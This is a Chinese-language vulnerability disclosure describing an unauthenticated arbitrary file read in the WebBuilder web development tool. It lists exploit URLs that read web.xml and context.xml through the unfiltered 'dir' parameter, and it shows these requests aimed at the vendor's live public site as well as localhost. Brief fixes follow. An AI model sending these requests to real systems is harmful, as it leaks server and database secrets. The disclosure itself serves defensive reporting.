开源Web应用开发工具WebBuilder存在任意文件读取 漏洞 ,可泄露服务器及 数据库 配置等关键信息。
代码中存在方法可以由用户控制路径读取文件:
查看数据库,调用此方法的xwl不需要登录验证,没有获取权限的情况下也可以访问:
于是,访问这个URL: 代码读取文件的的路径,是webbuilder/docs/,先尝试访问该文件夹下文件: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt
修改dir参数,没有过滤,比如提交web.xml路径: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@WEB-INF/web.xml
再试一个: http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@META-INF/context.xml
在WebBuilder官方的在线使用站上测试一下:
http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@WEB-INF/web.xml
http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@META-INF/context.xml
修复方案:
1.过滤。 2.读取文件时,对目录进行检验。
查看更多关于开源Web应用开发工具WebBuilder任意文件读取及修复的详细内容...